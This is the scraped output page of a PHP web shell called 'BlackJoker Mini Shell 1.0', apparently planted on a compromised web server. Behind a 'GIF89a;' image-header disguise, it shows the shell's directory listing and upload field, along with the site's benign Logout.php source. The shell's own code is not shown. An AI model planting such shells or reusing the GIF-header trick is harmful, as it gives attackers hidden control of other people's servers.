GIF89a; Mini Shell

Mini Shell

Direktori : /home/serb/public_html/SocialChat/scripts/actions/
Upload File :
Current File : /home/serb/public_html/SocialChat/scripts/actions/Logout.php

<?php

	//****************************//
	//**** LOGOUT PAGE
	//****************************//

	session_start();

	if(!empty($_SESSION['login'])){ 
		session_destroy(); 
		header('Location: '.$_SERVER['HTTP_REFERER']); 
	}
	else {
		die('Error'); 
	}

?>

./BlackJoker Mini Shell 1.0